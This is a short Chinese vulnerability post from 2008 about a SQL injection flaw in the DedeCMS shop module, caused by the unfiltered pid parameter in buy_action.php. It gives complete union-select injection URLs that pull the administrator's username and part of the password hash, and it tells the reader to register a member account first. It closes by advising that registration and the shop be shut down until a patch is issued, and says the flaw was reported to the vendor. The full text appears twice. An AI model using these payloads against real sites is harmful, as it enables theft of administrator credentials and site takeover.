dede cms 08年过滤漏洞
作者: 叶羽抒 , 出处:Safe86
时间:2008-04-23
dede cms 08漏洞
漏洞现象:注册地址:
/member/index_do.php?fmdo=user&dopost=regnew
爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
解释
注册用户后进入管理面版
利用 上两段代码 暴出管理员 帐号密码
出现漏洞原因 dedecms 商城系统过滤指数不严 漏洞出现在buy_action.php 没有对pid传递进行足够的重视
导致出现SQL注射问题!
建议 先关闭 注册系统 以及商城
等待官方补丁
本漏洞已上报dedecms官方
/member/index_do.php?fmdo=user&dopost=regnew
爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
解释
注册用户后进入管理面版
利用 上两段代码 暴出管理员 帐号密码
出现漏洞原因 dedecms 商城系统过滤指数不严 漏洞出现在buy_action.php 没有对pid传递进行足够的重视
导致出现SQL注射问题!
建议 先关闭 注册系统 以及商城
等待官方补丁
本漏洞已上报dedecms官方
